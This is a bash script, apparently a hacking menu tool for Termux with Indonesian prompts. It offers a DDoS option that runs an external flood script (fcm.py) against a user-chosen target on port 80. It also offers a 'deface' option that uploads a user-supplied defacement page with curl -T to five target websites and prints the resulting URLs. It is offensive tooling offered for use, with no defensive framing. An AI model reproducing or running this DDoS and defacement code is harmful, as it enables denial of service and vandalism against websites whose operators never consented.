#!/bin/bash
#version 1.2

black='\e[0;30m'
blue='\e[0;34m'
green='\e[0;32m'
cyan='\e[0;36m'
red='\e[0;31m'
purple='\e[0;35m'
brown='\e[0;33m'
lightgray='\e[0;37m'
darkgray='\e[1;30m'
lightblue='\e[1;34m'
lightgreen='\e[1;32m'
lightcyan='\e[1;36m'
lightred='\e[1;31m'
lightpurple='\e[1;35m'
yellow='\e[1;33m'
white='\e[1;37m'
nc='\e[0m'
clear
#######################################################

toilet -f slant "  Tools" | lolcat
toilet -f slant "Sederhana" | lolcat
#######################################################
echo -e  "$red                              ) _     _"
echo "                              ( (^)-~-(^)"
echo "___________________________,-.\_( 6 6 )__,-._________________________"
echo "|                          'M'   \   /   'M'                        |"
echo "|                                 >o<                               |"
echo "|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|"
echo -ne "|""${lightgreen}Today is:\t\t\t"${lightpurple} `date`;echo -e "      $red |"
echo -e "|""${lightgreen}Kernel Information: \t\t${lightpurple}" `uname -smr`"$red|"
echo "|___________________________________________________________________|"
echo "|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|"
echo -e "|""${lightgreen}LIST.                                      $red |"
echo -e "|""${lightgreen}VERSION 1.2|"
echo "|___________________________________________________________________|"
echo "[=] 1. CEK IP WEBSITE                   [=]" | lolcat
echo "[=] 2. DDOS                             [=]" | lolcat
echo "[=] 3. DEFACE BRUTAL                    [=]" | lolcat
echo "[=] 4. SCAN SHELL                       [=]" | lolcat
echo "[=] 5. EXIT                             [=]" | lolcat
echo "[=][===================================][=]" | lolcat
echo "╭─[=]B3T4[=]" Masukan Piliha  Anda |lolcat
read -p "╰─#" fcm
echo

if 
[ $fcm = 1 ] || [ $fcm = 1 ]
then
clear
toilet -f slant " CEK IP " |lolcat
toilet -f slant "  WEBSTIE " |lolcat
echo "╭─[=]B3T4[=]" Masukan Target anda |lolcat
read -p "╰─#" target
echo
 ping $target
echo
fi

if 
[ $fcm = 2 ] || [ $fcm = 2 ]
then
clear
toilet -f slant " DDOS " |lolcat
echo "╭─[=]B3T4[=]" Masukan Target anda |lolcat
read -p "╰─#" target
clear
echo
python3 fcm.py -s $target -p 80 -t 135
fi

if 
[ $fcm = 3 ] || [ $fcm = 3 ]
then
clear
toilet -f slant " DEFACE " |lolcat
toilet -f slant "     BRUTAL " |lolcat
echo   "[=][===================================][=]" | lolcat
echo $red"Nb:script deface nya agan taruh diluar"
echo $red"folder di penyimpanan internal ya gan"
echo   "[=][===================================][=]" | lolcat
echo    "╭─[=]B3T4[=]" Masukan Script anda |lolcat
read -p "╰─#" script
echo    "╭─[=]B3T4[=]" Masukan Target anda |lolcat
read -p "╰─#" target1
echo    "╭─[=]B3T4[=]" Masukan Target anda |lolcat
read -p "╰─#" target2
echo    "╭─[=]B3T4[=]" Masukan Target anda |lolcat
read -p "╰─#" target3
echo    "╭─[=]B3T4[=]" Masukan Target anda |lolcat
read -p "╰─#" target4
echo    "╭─[=]B3T4[=]" Masukan Target anda |lolcat
read -p "╰─#" target5
echo
curl -T /storage/emulated/0/$script $target1
curl -T /storage/emulated/0/$script $target2
curl -T /storage/emulated/0/$script $target3
curl -T /storage/emulated/0/$script $target4
curl -T /storage/emulated/0/$script $target5
echo   "[=][===================================][=]" | lolcat
echo $blue"Tunggu..."
echo   "[=][===================================][=]" | lolcat
echo $green"Hasil deface"
echo $red "$target1/$script"
echo $red "$target2/$script"
echo $red "$target3/$script"
echo $red "$target4/$script"
echo $red "$target5/$script"
echo   "[=][===================================][=]" | lolcat

echo
fi

if 
[ $fcm = 5 ] || [ $fcm = 5 ]
then
clear
toilet -f slant " EXIT " |lolcat
echo
echo   "[=][===================================][=]" | lolcat
echo $blue"Terimakasih Telah Menggunakan tools"
echo $blue"FRIENDS CYBER MUSLIM"
echo $blue"Salam anonymous cyber Indonesia"
echo   "[=][===================================][=]" | lolcat

echo
echo "╭─[=]B3T4[=]" YA/TIDAK |lolcat
read -p "╰─#" exit
echo
exit
CTRL+C
fi
